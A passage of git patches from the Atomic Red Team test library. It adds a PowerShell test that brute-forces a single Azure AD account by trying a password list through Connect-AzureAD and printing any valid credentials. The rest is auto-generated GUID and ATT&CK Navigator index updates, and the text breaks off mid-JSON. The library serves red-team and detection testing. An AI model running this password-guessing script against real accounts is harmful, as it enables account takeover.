From 62943530e9433d27d39ee5329b524138a032c1a0 Mon Sep 17 00:00:00 2001 From: piaconsigny <49986009+piaconsigny@users.noreply.github.com> Date: Thu, 8 Jul 2021 10:21:08 -0700 Subject: [PATCH 01/19] T1110.001 azureadaccounts (#1482) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * T1110.001 azureadaccounts * Update T1110.001.yaml * Apply suggestion * Remove typo Co-authored-by: Clément Notin --- atomics/T1110.001/T1110.001.yaml | 44 ++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 5601e6b1..495befef 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -84,3 +84,47 @@ atomic_tests: } } Write-Host "End of bruteforce" +- name: Brute Force Credentials of single Azure AD user + auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 + description: | + Attempt to brute force Azure AD user via AzureAD powershell module. + supported_platforms: + - azure-ad + input_arguments: + username: + description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@" + type: String + default: bruce.wayne@contoso.com + passwords: + description: List of passwords we will attempt to brute force with + type: String + default: Password1`n1q2w3e4r`nPassword! + dependency_executor_name: powershell + dependencies: + - description: | + AzureAD module must be installed. + prereq_command: | + if (Get-Module AzureAD) {exit 0} else {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + name: powershell + elevation_required: false + command: | + Import-Module -Name AzureAD + + $passwords = "#{passwords}".split("{`n}") + foreach($password in $passwords) { + $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + try { + Write-Host " [-] Attempting ${password} on account #{username}." + Connect-AzureAD -Credential $Credential 2>&1> $null + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] #{username}:${password} are valid credentials!`r`n" + break + } catch { + Write-Host " [-] #{username}:${password} invalid credentials.`r`n" + } + } + Write-Host "End of bruteforce" From 6036df88ac385b406c745547d959f2926c336cb5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 8 Jul 2021 17:21:50 +0000 Subject: [PATCH 02/19] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 4b83c6ba..6a2b05f5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -728,3 +728,4 @@ b4988cad-6ed2-434d-ace5-ea2670782129 649349c7-9abf-493b-a7a2-b1aa4d141528 a8aa2d3e-1c52-4016-bc73-0f8854cfa80a c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 +5a51ef57-299e-4d62-8e11-2d440df55e69 From 66bf3375bacf3467e0e3430aa682cbc8a8119159 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 8 Jul 2021 17:21:56 +0000 Subject: [PATCH 03/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/index.yaml | 49 ++++++++++++++ atomics/T1110.001/T1110.001.md | 64 +++++++++++++++++++ 8 files changed, 120 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 509eba67..ec2db3f7 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob